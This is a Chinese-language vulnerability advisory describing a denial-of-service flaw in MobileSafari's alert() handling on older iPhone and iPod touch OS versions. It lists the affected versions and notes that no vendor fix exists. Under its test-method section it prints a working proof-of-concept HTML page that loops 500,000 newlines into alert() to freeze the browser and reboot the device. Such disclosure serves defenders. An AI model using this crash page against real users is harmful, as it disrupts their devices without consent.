漏洞起因
设计错误
影响系统
Apple iPod Touch 2.2.1
Apple iPod Touch 2.0.2
Apple iPod Touch 2.0.1
Apple iPod Touch 1.1.4
Apple iPod Touch 1.1.3
Apple iPod Touch 1.1.2
Apple iPod Touch 1.1.1
Apple iPod Touch 3.0
Apple iPod Touch 2.2
Apple iPod Touch 2.1
Apple iPod Touch 2.0
Apple iPod Touch 1.1
Apple iPhone 3.0.1
Apple iPhone 2.2.1
Apple iPhone 2.0.2
Apple iPhone 2.0.1
Apple iPhone 1.1.4
Apple iPhone 1.1.3
Apple iPhone 1.1.2
Apple iPhone 1.1.1
Apple iPhone 1.0.2
Apple iPhone 1.0.1
Apple iPhone 3.0
Apple iPhone 2.2
Apple iPhone 2.1
Apple iPhone 2.0
Apple iPhone 1.1
Apple iPhone 1
不受影响系统
危害
远程攻击者可以利用漏洞使应用程序崩溃。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户打开。
漏洞信息
iPod touch是苹果公司发布的MP4播放器,iPhone是其发布的智能手机。
Apple iPhone/iPod touch包含的Safari浏览器处理Alert函数存在问题,攻击者可以构建恶意WEB页,诱使用户打开,使应用程序崩溃。
测试方法
# Apple iPhone (MobileSafari) Crash & Reboot
# TheLeader, GSOG [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il nullbyte.org.il
# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.
# Exploit:
<html>
<body>
<script>
var a = '';
for (var i = 1; i <= 500000; i++)
{
a += '\n';
}
alert(a);
</script>
</body>
</html>
厂商解决方案
目前没有详细解决方案提供:
http://www.apple.com/iphone/
http://www.apple.com/ipodtouch/
漏洞提供者
TheLeader
0 条评论。